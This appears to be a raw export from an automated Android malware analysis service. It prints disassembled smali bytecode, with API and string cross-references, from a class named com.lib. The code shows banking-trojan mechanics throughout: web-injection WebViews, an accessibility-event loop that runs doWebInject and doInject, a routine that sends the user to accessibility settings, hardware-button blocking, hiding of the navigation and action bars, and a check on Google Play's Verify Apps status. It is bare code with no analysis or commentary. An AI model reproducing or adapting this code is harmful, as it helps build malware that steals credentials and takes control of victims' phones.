                        10cond_10: new-instance v4, Ljava/lang/StringBuilder;
                        12invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        14iget-object v5, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mPrefix:Ljava/lang/String;
                        16invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        18const-string v5, " "
                        20invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        22invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        23move-result-object v4
                        25invoke-direct {v0, v1, v2, v3, v4}, Landroidx/versionedparcelable/VersionedParcelParcel;-><init>(Landroid/os/Parcel;IILjava/lang/String;)V
                        26return-object v0
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Integer.intValue
                        Strings
                        • [func] [activity] [isFinishing]
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Ljava/lang/StringBuilder;
                        3invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        5const-string v1, "[func] [activity] [isFinishing] "
                        7invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        8move-result-object v0
                        10invoke-virtual {v0, p5}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        11move-result-object v0
                        13invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        14move-result-object v0
                        16invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        17const/4 v0, 0x0
                        19invoke-virtual {p5}, Ljava/lang/Integer;->intValue()I
                        20move-result v1
                        21const/4 v2, 0x6
                        22if-ne v1, v2, :cond_1e
                        23cond_1e: return v0
                        Cross References
                        APIs
                        • android.content.Intent.<init>
                        • android.content.Intent.addCategory
                        • android.content.Intent.setFlags
                        • android.content.Context.startActivity
                        Strings
                        • android.intent.action.MAIN
                        • android.intent.category.HOME
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Landroid/content/Intent;
                        3const-string v1, "android.intent.action.MAIN"
                        5invoke-direct {v0, v1}, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
                        7const-string v1, "android.intent.category.HOME"
                        9invoke-virtual {v0, v1}, Landroid/content/Intent;->addCategory(Ljava/lang/String;)Landroid/content/Intent;
                        10const v1, 0x10008000
                        12invoke-virtual {v0, v1}, Landroid/content/Intent;->setFlags(I)Landroid/content/Intent;
                        14invoke-virtual {p1, v0}, Landroid/content/Context;->startActivity(Landroid/content/Intent;)V
                        15return-void
                        Cross References
                        APIs
                        • java.util.ArrayList.<init>
                        • java.util.ArrayList.add
                        • java.util.ArrayList.add
                        • java.util.ArrayList.add
                        • java.util.ArrayList.add
                        • java.util.ArrayList.add
                        • java.util.ArrayList.toArray
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"<T:",
                        3"Ljava/lang/Object;",
                        4">([TT;)[TT;"
                        5}
                        6.end annotation
                        8invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readInt()I
                        9move-result v0
                        10const/4 v1, 0x0
                        11if-gez v0, :cond_8
                        12return-object v1
                        13cond_8: new-instance v2, Ljava/util/ArrayList;
                        15invoke-direct {v2, v0}, Ljava/util/ArrayList;-><init>(I)V
                        16if-eqz v0, :cond_62
                        18invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readInt()I
                        19move-result v3
                        20if-gez v0, :cond_16
                        21return-object v1
                        22cond_16: const/4 v1, 0x1
                        23if-eq v3, v1, :cond_56
                        24const/4 v1, 0x2
                        25if-eq v3, v1, :cond_4a
                        26const/4 v1, 0x3
                        27if-eq v3, v1, :cond_3e
                        28const/4 v1, 0x4
                        29if-eq v3, v1, :cond_32
                        30const/4 v1, 0x5
                        31if-eq v3, v1, :cond_26
                        32goto/16 :goto_62
                        33cond_26: if-lez v0, :cond_62
                        35invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readStrongBinder()Landroid/os/IBinder;
                        36move-result-object v1
                        38invoke-virtual {v2, v1}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
                        39add-int/lit8 v0, v0, -0x1
                        40goto/16 :goto_26
                        41goto_32: if-lez v0, :cond_62
                        43invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readString()Ljava/lang/String;
                        44move-result-object v1
                        46invoke-virtual {v2, v1}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
                        47add-int/lit8 v0, v0, -0x1
                        48goto/16 :goto_32
                        49goto_3e: if-lez v0, :cond_62
                        51invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readSerializable()Ljava/io/Serializable;
                        52move-result-object v1
                        54invoke-virtual {v2, v1}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
                        55add-int/lit8 v0, v0, -0x1
                        56goto/16 :goto_3e
                        57goto_4a: if-lez v0, :cond_62
                        59invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readParcelable()Landroid/os/Parcelable;
                        60move-result-object v1
                        62invoke-virtual {v2, v1}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
                        63add-int/lit8 v0, v0, -0x1
                        64goto/16 :goto_4a
                        65goto_56: if-lez v0, :cond_62
                        67invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readVersionedParcelable()Landroidx/versionedparcelable/VersionedParcelable;
                        68move-result-object v1
                        70invoke-virtual {v2, v1}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
                        71add-int/lit8 v0, v0, -0x1
                        72goto/16 :goto_56
                        73goto_62:
                        74invoke-virtual {v2, p1}, Ljava/util/ArrayList;->toArray([Ljava/lang/Object;)[Ljava/lang/Object;
                        75move-result-object p1
                        76return-object p1
                        Cross References
                        APIs
                        • java.util.Random.<init>
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.length
                        • java.util.Random.nextInt
                        • java.lang.Integer.toHexString
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Ljava/util/Random;
                        3invoke-direct {v0}, Ljava/util/Random;-><init>()V
                        4new-instance v1, Ljava/lang/StringBuilder;
                        6invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        7goto_a:
                        8invoke-virtual {v1}, Ljava/lang/StringBuilder;->length()I
                        9move-result v2
                        10if-ge v2, p0, :cond_1c
                        12invoke-virtual {v0}, Ljava/util/Random;->nextInt()I
                        13move-result v2
                        15invoke-static {v2}, Ljava/lang/Integer;->toHexString(I)Ljava/lang/String;
                        16move-result-object v2
                        18invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        19goto/16 :goto_a
                        20cond_1c:
                        21invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        22move-result-object v0
                        23return-object v0
                        APIs
                        • android.webkit.WebView.<init>
                        • android.webkit.WebView.getSettings
                        • android.webkit.WebSettings.setDomStorageEnabled
                        • android.webkit.WebView.getSettings
                        • android.webkit.WebSettings.setJavaScriptEnabled
                        • com.lib$webInjViewClientOld.<init>
                        • android.webkit.WebView.setWebViewClient
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v2, 0x1
                        2new-instance v0, Landroid/webkit/WebView;
                        4invoke-direct {v0, p1}, Landroid/webkit/WebView;-><init>(Landroid/content/Context;)V
                        6invoke-virtual {v0}, Landroid/webkit/WebView;->getSettings()Landroid/webkit/WebSettings;
                        7move-result-object v1
                        9invoke-virtual {v1, v2}, Landroid/webkit/WebSettings;->setDomStorageEnabled(Z)V
                        11invoke-virtual {v0}, Landroid/webkit/WebView;->getSettings()Landroid/webkit/WebSettings;
                        12move-result-object v1
                        14invoke-virtual {v1, v2}, Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V
                        15new-instance v1, Lcom/lib$webInjViewClientOld;
                        17invoke-direct {v1, p0, p1, p2, v0}, Lcom/lib$webInjViewClientOld;-><init>(Lcom/lib;Landroid/content/Context;Ljava/lang/String;Landroid/webkit/WebView;)V
                        19invoke-virtual {v0, v1}, Landroid/webkit/WebView;->setWebViewClient(Landroid/webkit/WebViewClient;)V
                        20return-object v0
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Strings
                        • pinnedPrefs
                        Position Instruction Meta Information
                        0.prologue
                        1try_start_0:
                        2sget-object v0, Lcom/lib;->autorunMutex:Ljava/util/concurrent/Semaphore;
                        4invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->acquire()V
                        5try_start_5: sget-boolean v0, Lcom/lib;->isAutoruned:Z
                        6if-nez v0, :cond_39
                        8iget-object v0, p0, Lcom/lib;->context:Landroid/content/Context;
                        10iget-object v1, p0, Lcom/lib;->a11yClassName:Ljava/lang/String;
                        12invoke-virtual {p0, v0, v1}, Lcom/lib;->isA11y(Landroid/content/Context;Ljava/lang/String;)Z
                        13move-result v0
                        14if-eqz v0, :cond_39
                        16iget-object v0, p0, Lcom/lib;->context:Landroid/content/Context;
                        18const-string v1, "pinnedPrefs"
                        20invoke-virtual {p0, v0, v1}, Lcom/lib;->isNeedPinned(Landroid/content/Context;Ljava/lang/String;)Z
                        21move-result v0
                        22if-eqz v0, :cond_36
                        24iget-object v0, p0, Lcom/lib;->context:Landroid/content/Context;
                        26iget-object v1, p0, Lcom/lib;->context:Landroid/content/Context;
                        28const-string v2, "pinnedPrefs"
                        30sget-object v3, Lcom/lib;->STRINGS_HTML:Ljava/lang/String;
                        32invoke-virtual {p0, v1, v2, v3}, Lcom/lib;->getPinnedPref(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        33move-result-object v1
                        35iget-object v2, p0, Lcom/lib;->context:Landroid/content/Context;
                        37const-string v3, "pinnedPrefs"
                        39sget-object v4, Lcom/lib;->STRINGS_BG:Ljava/lang/String;
                        41invoke-virtual {p0, v2, v3, v4}, Lcom/lib;->getPinnedPref(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        42move-result-object v2
                        44invoke-virtual {p0, v0, v1, v2}, Lcom/lib;->showPinnned(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)Z
                        45cond_36: const/4 v0, 0x1
                        46sput-boolean v0, Lcom/lib;->isAutoruned:Z
                        47try_end_39:
                        48sget-object v0, Lcom/lib;->autorunMutex:Ljava/util/concurrent/Semaphore;
                        50invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        51goto_3e: return-void
                        52catch_3f: move-exception v0
                        54sget-object v0, Lcom/lib;->autorunMutex:Ljava/util/concurrent/Semaphore;
                        56invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        57goto/16 :goto_3e
                        58catch_46: move-exception v0
                        59goto/16 :goto_3e
                        60catchall_48: move-exception v0
                        62sget-object v1, Lcom/lib;->autorunMutex:Ljava/util/concurrent/Semaphore;
                        64invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        65throw v0
                        APIs
                        • android.os.Looper.prepare
                        • java.util.concurrent.BlockingQueue.take
                        • java.lang.Thread.sleep
                        • com.lib$9.this$0:Lcom/lib
                        • com.lib$9.this$0:Lcom/lib
                        • com.lib$9.this$0:Lcom/lib
                        • com.lib$9.this$0:Lcom/lib
                        • com.lib$9.this$0:Lcom/lib
                        • java.lang.Thread.start
                        Strings
                        • webInjPrefs
                        Position Instruction Meta Information
                        0.prologue
                        1try_start_0:
                        2invoke-static {}, Landroid/os/Looper;->prepare()V
                        3goto_3:
                        4sget-object v0, Lcom/lib;->injectEventQueue:Ljava/util/concurrent/BlockingQueue;
                        6invoke-interface {v0}, Ljava/util/concurrent/BlockingQueue;->take()Ljava/lang/Object;
                        7move-result-object v0
                        8check-cast v0, Lcom/libInterface$injectEvent;
                        10invoke-virtual {v0}, Lcom/libInterface$injectEvent;->get()Landroid/view/accessibility/AccessibilityEvent;
                        11move-result-object v1
                        12if-eqz v1, :cond_4a
                        13const-wide/16 v2, 0xa
                        15invoke-static {v2, v3}, Ljava/lang/Thread;->sleep(J)V
                        17invoke-virtual {v0}, Lcom/libInterface$injectEvent;->get()Landroid/view/accessibility/AccessibilityEvent;
                        18move-result-object v0
                        20iget-object v1, p0, Lcom/lib$9;->this$0:Lcom/lib;
                        22invoke-virtual {v1, v0}, Lcom/lib;->unDeleteA11y(Landroid/view/accessibility/AccessibilityEvent;)Z
                        23move-result v1
                        24if-eqz v1, :cond_22
                        25cond_22:
                        26iget-object v1, p0, Lcom/lib$9;->this$0:Lcom/lib;
                        28invoke-virtual {v1, v0}, Lcom/lib;->activatePinned(Landroid/view/accessibility/AccessibilityEvent;)Z
                        29move-result v1
                        30if-eqz v1, :cond_2a
                        31cond_2a:
                        32iget-object v1, p0, Lcom/lib$9;->this$0:Lcom/lib;
                        34sget-object v2, Lcom/lib;->a11yContext:Landroid/content/Context;
                        36const-string v3, "webInjPrefs"
                        37const/16 v4, 0x10
                        39invoke-static {v4}, Lcom/lib;->randStr(I)Ljava/lang/String;
                        40move-result-object v4
                        42invoke-virtual {v1, v2, v3, v0, v4}, Lcom/lib;->doWebInject(Landroid/content/Context;Ljava/lang/String;Landroid/view/accessibility/AccessibilityEvent;Ljava/lang/String;)Z
                        43move-result v1
                        44if-eqz v1, :cond_3c
                        45cond_3c:
                        46iget-object v1, p0, Lcom/lib$9;->this$0:Lcom/lib;
                        48invoke-virtual {v1, v0}, Lcom/lib;->doInject(Landroid/view/accessibility/AccessibilityEvent;)V
                        49try_end_41: goto/16 :goto_3
                        50catch_42: move-exception v0
                        52iget-object v0, p0, Lcom/lib$9;->this$0:Lcom/lib;
                        54iget-object v0, v0, Lcom/lib;->a11yInjectThread:Ljava/lang/Thread;
                        56invoke-virtual {v0}, Ljava/lang/Thread;->start()V
                        57cond_4a: return-void
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • [func] [getGpStatus] T:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v1, 0x0
                        2try_start_1:
                        3invoke-static {p1}, Lcom/google/android/gms/safetynet/SafetyNet;->getClient(Landroid/content/Context;)Lcom/google/android/gms/safetynet/SafetyNetClient;
                        4move-result-object v0
                        6invoke-virtual {v0}, Lcom/google/android/gms/safetynet/SafetyNetClient;->isVerifyAppsEnabled()Lcom/google/android/gms/tasks/Task;
                        7move-result-object v0
                        9invoke-static {v0}, Lcom/google/android/gms/tasks/Tasks;->await(Lcom/google/android/gms/tasks/Task;)Ljava/lang/Object;
                        11invoke-virtual {v0}, Lcom/google/android/gms/tasks/Task;->isSuccessful()Z
                        12move-result v2
                        13if-eqz v2, :cond_37
                        15invoke-virtual {v0}, Lcom/google/android/gms/tasks/Task;->getResult()Ljava/lang/Object;
                        16move-result-object v0
                        17check-cast v0, Lcom/google/android/gms/safetynet/SafetyNetApi$VerifyAppsUserResponse;
                        19invoke-virtual {v0}, Lcom/google/android/gms/safetynet/SafetyNetApi$VerifyAppsUserResponse;->isVerifyAppsEnabled()Z
                        20try_end_1b: move-result v0
                        21if-eqz v0, :cond_37
                        22const/4 v0, 0x1
                        23goto_1f: return v0
                        24catch_20: move-exception v0
                        25new-instance v2, Ljava/lang/StringBuilder;
                        27invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        29const-string v3, "[func] [getGpStatus] T: "
                        31invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        32move-result-object v2
                        34invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        35move-result-object v0
                        37invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        38move-result-object v0
                        40invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        41cond_37: move v0, v1
                        42goto/16 :goto_1f
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • [func] [hideActBar] T:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x1
                        2try_start_1:
                        3invoke-static {p1, v0}, Lcom/lib;->hideArea(Landroid/content/Context;Z)Landroid/widget/FrameLayout;
                        4try_end_4: move-result-object v0
                        5goto_5: return-object v0
                        6catch_6: move-exception v0
                        7new-instance v1, Ljava/lang/StringBuilder;
                        9invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        11const-string v2, "[func] [hideActBar] T: "
                        13invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        14move-result-object v1
                        16invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        17move-result-object v0
                        19invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        20move-result-object v0
                        22invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        23const/4 v0, 0x0
                        24goto/16 :goto_5
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • [func] [hideNavBar] T:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2const/4 v1, 0x0
                        3try_start_2:
                        4invoke-static {p1, v1}, Lcom/lib;->hideArea(Landroid/content/Context;Z)Landroid/widget/FrameLayout;
                        5try_end_5: move-result-object v0
                        6goto_6: return-object v0
                        7catch_7: move-exception v1
                        8new-instance v2, Ljava/lang/StringBuilder;
                        10invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        12const-string v3, "[func] [hideNavBar] T: "
                        14invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        15move-result-object v2
                        17invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        18move-result-object v1
                        20invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        21move-result-object v1
                        23invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        24goto/16 :goto_6
                        APIs
                        • android.content.Intent.<init>
                        • android.content.Intent.addFlags
                        • android.content.Context.startActivity
                        • android.content.DialogInterface.dismiss
                        Strings
                        • android.settings.ACCESSIBILITY_SETTINGS
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Landroid/content/Intent;
                        3const-string v1, "android.settings.ACCESSIBILITY_SETTINGS"
                        5invoke-direct {v0, v1}, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
                        6const/high16 v1, 0x54000000
                        8invoke-virtual {v0, v1}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
                        10iget-object v1, p0, Lcom/lib$3;->val$context:Landroid/content/Context;
                        12invoke-virtual {v1, v0}, Landroid/content/Context;->startActivity(Landroid/content/Intent;)V
                        14iget-object v0, p0, Lcom/lib$3;->this$0:Lcom/lib;
                        15const/4 v1, 0x0
                        16iput-boolean v1, v0, Lcom/lib;->a11yAlertVisible:Z
                        18invoke-interface {p1}, Landroid/content/DialogInterface;->dismiss()V
                        19return-void
                        Cross References
                        APIs
                        • android.content.Intent.<init>
                        • android.content.Intent.addFlags
                        • android.content.Intent.putExtra
                        • android.content.Context.startActivity
                        Strings
                        • mode
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x1
                        2sput-boolean v0, Lcom/lib;->blockHardwareButtons:Z
                        3new-instance v0, Landroid/content/Intent;
                        5sget-object v1, Lcom/lib;->activityHelperClass:Ljava/lang/Class;
                        7invoke-direct {v0, p1, v1}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
                        8const/high16 v1, 0x54000000
                        10invoke-virtual {v0, v1}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
                        12const-string v1, "mode"
                        13const/4 v2, 0x5
                        15invoke-virtual {v0, v1, v2}, Landroid/content/Intent;->putExtra(Ljava/lang/String;I)Landroid/content/Intent;
                        17invoke-virtual {p1, v0}, Landroid/content/Context;->startActivity(Landroid/content/Intent;)V
                        18return-void
                        Cross References
                        APIs
                        • android.webkit.WebView.getSettings
                        • android.webkit.WebSettings.setDomStorageEnabled
                        • android.webkit.WebView.getSettings
                        • android.webkit.WebSettings.setJavaScriptEnabled
                        • com.lib$webInjViewClient.<init>
                        • android.webkit.WebView.setWebViewClient
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v1, 0x1
                        3invoke-virtual {p3}, Landroid/webkit/WebView;->getSettings()Landroid/webkit/WebSettings;
                        4move-result-object v0
                        6invoke-virtual {v0, v1}, Landroid/webkit/WebSettings;->setDomStorageEnabled(Z)V
                        8invoke-virtual {p3}, Landroid/webkit/WebView;->getSettings()Landroid/webkit/WebSettings;
                        9move-result-object v0
                        11invoke-virtual {v0, v1}, Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V
                        12new-instance v0, Lcom/lib$webInjViewClient;
                        14invoke-direct {v0, p0, p1, p4, p2}, Lcom/lib$webInjViewClient;-><init>(Lcom/lib;Landroid/content/Context;Ljava/lang/String;Landroid/app/Activity;)V
                        16invoke-virtual {p3, v0}, Landroid/webkit/WebView;->setWebViewClient(Landroid/webkit/WebViewClient;)V
                        17return-object p3
                        APIs
                        • android.content.Intent.<init>
                        • android.content.Intent.addFlags
                        • android.content.Intent.putExtra
                        • android.content.Context.startActivity
                        Strings
                        • mode
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Landroid/content/Intent;
                        3sget-object v1, Lcom/lib;->activityHelperClass:Ljava/lang/Class;
                        5invoke-direct {v0, p1, v1}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
                        6const/high16 v1, 0x54000000
                        8invoke-virtual {v0, v1}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
                        10const-string v1, "mode"
                        11const/4 v2, 0x4
                        13invoke-virtual {v0, v1, v2}, Landroid/content/Intent;->putExtra(Ljava/lang/String;I)Landroid/content/Intent;
                        15invoke-virtual {p1, v0}, Landroid/content/Context;->startActivity(Landroid/content/Intent;)V
                        16return-void
                        APIs
                        • android.content.Intent.<init>
                        • android.content.Intent.addFlags
                        • android.content.Intent.putExtra
                        • android.content.Context.startActivity
                        Strings
                        • mode
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Landroid/content/Intent;
                        3sget-object v1, Lcom/lib;->activityHelperClass:Ljava/lang/Class;
                        5invoke-direct {v0, p1, v1}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
                        6const/high16 v1, 0x54000000
                        8invoke-virtual {v0, v1}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
                        10const-string v1, "mode"
                        11const/4 v2, 0x3
                        13invoke-virtual {v0, v1, v2}, Landroid/content/Intent;->putExtra(Ljava/lang/String;I)Landroid/content/Intent;
                        15invoke-virtual {p1, v0}, Landroid/content/Context;->startActivity(Landroid/content/Intent;)V
                        16return-void
                        Cross References
                        APIs
                        • java.util.Collection.add
                        • java.util.Collection.add
                        • java.util.Collection.add
                        • java.util.Collection.add
                        • java.util.Collection.add
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"<T:",
                        3"Ljava/lang/Object;",
                        4"S::",
                        5"Ljava/util/Collection<",
                        6"TT;>;>(ITS;)TS;"
                        7}
                        8.end annotation
                        10invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readInt()I
                        11move-result p1
                        12const/4 v0, 0x0
                        13if-gez p1, :cond_8
                        14return-object v0
                        15cond_8: if-eqz p1, :cond_5d
                        17invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readInt()I
                        18move-result v1
                        19if-gez p1, :cond_11
                        20return-object v0
                        21cond_11: const/4 v0, 0x1
                        22if-eq v1, v0, :cond_51
                        23const/4 v0, 0x2
                        24if-eq v1, v0, :cond_45
                        25const/4 v0, 0x3
                        26if-eq v1, v0, :cond_39
                        27const/4 v0, 0x4
                        28if-eq v1, v0, :cond_2d
                        29const/4 v0, 0x5
                        30if-eq v1, v0, :cond_21
                        31goto/16 :goto_5d
                        32goto_21: if-lez p1, :cond_5d
                        34invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readStrongBinder()Landroid/os/IBinder;
                        35move-result-object v0
                        37invoke-interface {p2, v0}, Ljava/util/Collection;->add(Ljava/lang/Object;)Z
                        38add-int/lit8 p1, p1, -0x1
                        39goto/16 :goto_21
                        40goto_2d: if-lez p1, :cond_5d
                        42invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readString()Ljava/lang/String;
                        43move-result-object v0
                        45invoke-interface {p2, v0}, Ljava/util/Collection;->add(Ljava/lang/Object;)Z
                        46add-int/lit8 p1, p1, -0x1
                        47goto/16 :goto_2d
                        48cond_39: if-lez p1, :cond_5d
                        50invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readSerializable()Ljava/io/Serializable;
                        51move-result-object v0
                        53invoke-interface {p2, v0}, Ljava/util/Collection;->add(Ljava/lang/Object;)Z
                        54add-int/lit8 p1, p1, -0x1
                        55goto/16 :goto_39
                        56goto_45: if-lez p1, :cond_5d
                        58invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readParcelable()Landroid/os/Parcelable;
                        59move-result-object v0
                        61invoke-interface {p2, v0}, Ljava/util/Collection;->add(Ljava/lang/Object;)Z
                        62add-int/lit8 p1, p1, -0x1
                        63goto/16 :goto_45
                        64goto_51: if-lez p1, :cond_5d
                        66invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readVersionedParcelable()Landroidx/versionedparcelable/VersionedParcelable;
                        67move-result-object v0
                        69invoke-interface {p2, v0}, Ljava/util/Collection;->add(Ljava/lang/Object;)Z
                        70add-int/lit8 p1, p1, -0x1
                        71goto/16 :goto_51
                        72goto_5d: return-object p2
                        APIs
                        • java.lang.Object.getClass
                        • java.lang.Class.getClassLoader
                        • java.lang.Class.getClassLoader
                        • java.lang.RuntimeException.<init>
                        • java.lang.Exception.getMessage
                        Position Instruction Meta Information
                        1invoke-virtual {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->setOutputField(I)V
                        2if-nez p1, :cond_9
                        4invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->writeNoException()V
                        5return-void
                        6cond_9: const/4 p2, 0x0
                        7instance-of v0, p1, Landroid/os/Parcelable;
                        8const/16 v1, -0x9
                        9if-eqz v0, :cond_23
                        11invoke-virtual {p1}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        12move-result-object v0
                        14invoke-virtual {v0}, Ljava/lang/Class;->getClassLoader()Ljava/lang/ClassLoader;
                        15move-result-object v0
                        16const-class v2, Landroid/os/Parcelable;
                        18invoke-virtual {v2}, Ljava/lang/Class;->getClassLoader()Ljava/lang/ClassLoader;
                        19move-result-object v2
                        20if-ne v0, v2, :cond_23
                        21const/16 p2, -0x9
                        22goto/16 :goto_4c
                        23cond_23: instance-of v0, p1, Ljava/lang/SecurityException;
                        24if-eqz v0, :cond_29
                        25const/4 p2, -0x1
                        26goto/16 :goto_4c
                        27cond_29: instance-of v0, p1, Landroid/os/BadParcelableException;
                        28if-eqz v0, :cond_2f
                        29const/4 p2, -0x2
                        30goto/16 :goto_4c
                        31cond_2f: instance-of v0, p1, Ljava/lang/IllegalArgumentException;
                        32if-eqz v0, :cond_35
                        33const/4 p2, -0x3
                        34goto/16 :goto_4c
                        35cond_35: instance-of v0, p1, Ljava/lang/NullPointerException;
                        36if-eqz v0, :cond_3b
                        37const/4 p2, -0x4
                        38goto/16 :goto_4c
                        39cond_3b: instance-of v0, p1, Ljava/lang/IllegalStateException;
                        40if-eqz v0, :cond_41
                        41const/4 p2, -0x5
                        42goto/16 :goto_4c
                        43cond_41: instance-of v0, p1, Landroid/os/NetworkOnMainThreadException;
                        44if-eqz v0, :cond_47
                        45const/4 p2, -0x6
                        46goto/16 :goto_4c
                        47cond_47: instance-of v0, p1, Ljava/lang/UnsupportedOperationException;
                        48if-eqz v0, :cond_4c
                        49const/4 p2, -0x7
                        50goto_4c:
                        51invoke-virtual {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->writeInt(I)V
                        52if-nez p2, :cond_5e
                        53instance-of p2, p1, Ljava/lang/RuntimeException;
                        54if-eqz p2, :cond_58
                        55check-cast p1, Ljava/lang/RuntimeException;
                        56throw p1
                        57cond_58: new-instance p2, Ljava/lang/RuntimeException;
                        59invoke-direct {p2, p1}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/Throwable;)V
                        60throw p2
                        61cond_5e:
                        62invoke-virtual {p1}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
                        63move-result-object v0
